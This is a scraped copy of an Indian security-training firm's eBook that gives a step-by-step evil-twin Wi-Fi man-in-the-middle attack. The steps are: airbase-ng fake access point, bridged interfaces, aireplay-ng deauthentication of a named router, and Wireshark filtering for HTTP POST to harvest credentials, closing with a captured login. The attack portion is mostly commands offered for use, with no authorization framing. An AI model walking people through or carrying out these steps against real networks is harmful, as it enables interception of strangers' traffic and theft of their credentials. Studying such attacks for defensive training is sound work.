12
7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 1/12

Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

Embed Size (px)

Citation preview

Page 1: Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 1/12

Page 2: Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 2/12

 

SECUGENIUS SECURITY SOLUTIONS 

--------------------------------------------------------------------------------------

(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)

Company Profile:

Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student

Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS

are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius

Security Solutions are providing training in Information Security and various professional courses.

Secugenius Security Solutions is an organization which believes in inventing and implementing newideas to influence the technological minds of the youngsters

Looking at the number of Cyber Crimes since last many years, We at Secugenius Security

Solutions provides training on Ethical hacking & Cyber Security to students, IT Professionals, Bank 

Employees, Police officials.

Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the

benefit of the students & making them aware of the latest trends in technological era of the

Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the

nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime

Investigation & Forensic Sciences

Secugenius provides various security solutions to its clients by securing their websites from cyber

attacks. We provide training to college students, graduates and professionals in various fields.

Education is delivered to students through two modes i.e. Regular mode and Distance mode which

are available as short term and long term courses.

In the workshops conducted by Secugenius, participants can claim to be trained by the highly

experienced & skilled corporate trainers from different parts of the nation. We believe in making

the base of students to be as strong as possible. All the modules have been designed in order to

provide students with specialized knowledge by specialized trainers.

This library was furnished, managed and funded by the Founders and Directors of Secugenius

Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of 

the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security

Solutions.

This Online Digital Library has been initiated as a free resource & permanent

resource on specialization basis for every student of Team Secugenius.

Page 3: Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 3/12

 

Wi-Fi Packet Capturing & Session Hijacking

Product ID No: SG/ODL/13001

Founder & Director: Harpreet Khattar & Kshitij Adhlakha

Resource Person: Chetan Soni

Secugenius Security Solutions 

SCO-13A, Model Town Extn, Near Krishna Mandir,

Ludhiana-141002, Punjab – India

[email protected][email protected] 

www.secugenius.com , www.seculabs.in 

Page 4: Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 4/12

 

Introduction

The main Objective of this Attack is to make a Fake Access point and send thefake ARP Packets on same Wi-Fi Network from where the users are connectedand the name of fake access point is same as the name of the wireless

network reside there. So when a fake access point is created with samewireless network name then the user which is connected to original network gets disconnected and connects with your fake access point, so all the traffictunnels throughout my system and we get all details/credentials/informationof that user which is generally known as session hijacking.

Requirements

1.  Backtrack Operating System (BT5)2.   Virtual Machine (With USB Adapter)

3.  Internet Access on your System

(This Picture is taken by Nipun Jaswal)

Page 5: Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 5/12

 

1. Open Backtrack Operating System and start Terminal and type “iwconfig” 

for checking wireless interface.

2. Start this Wireless Interface by typing this command “airmon-ng start

wlan0”. 

It will enable your monitor mode (mon0).

Page 6: Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 6/12

 

3. Start your monitor mode by typing this command “airodump-ng mon0” .

It captures data from all stations.

4. Now Setup your Fake Router by typing this command “airbase-ng  –e

 “faswal1234” mon0”  

Page 7: Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 7/12

 

5. Now its time to bridge all networks by typing these commands

 “brctladdbrmitm”   “brctladdifmitm eth0”  

 “brctladdifmitm at0”  

Page 8: Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 8/12

 

6. Now Setting up New configurations by typing these commands.

 “ifconfig eth0 0.0.0.0 up”  

 “ifconfig at0 0.0.0.0 up”  

7. Now it’s time to turn on MITM Interface by typing this command “ifconfig

mitm up”  

Page 9: Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 9/12

8. Set up the channel ID which is shown above in airodump-ng command by

typing these commands “iwconfig mon0 channel 4”  or “iwconfig

wlan0 channel 4”  

9. Now send the deauthentication packets to the router by typing this

command

 “aireplay-ng –deauth 0 –a 00:24:97:b9:3a:90 mon0”  

Page 10: Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 10/12

 

10.  Now it’s time to assigning the IP to all victims by typing this

command “dhclient3 mitm&”  

11.  Here you can see that one client is connected to our fake accesspoint whose bssid is “D0:DF:9A:C0:FF:7B”  

Page 11: Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 11/12

 

12.  Start your Wireshark Sniffing Tool by typing this command

 “wireshark&”  

13.  Now Select the Interface (at0) and click on START.

Page 12: Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack

http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 12/12

 

14.  Type “http contains POST” and you can see that all packets be in

your sniffing tool. 

http://black.chetansoni.org/main_login.php 

Username – john

Password – 1234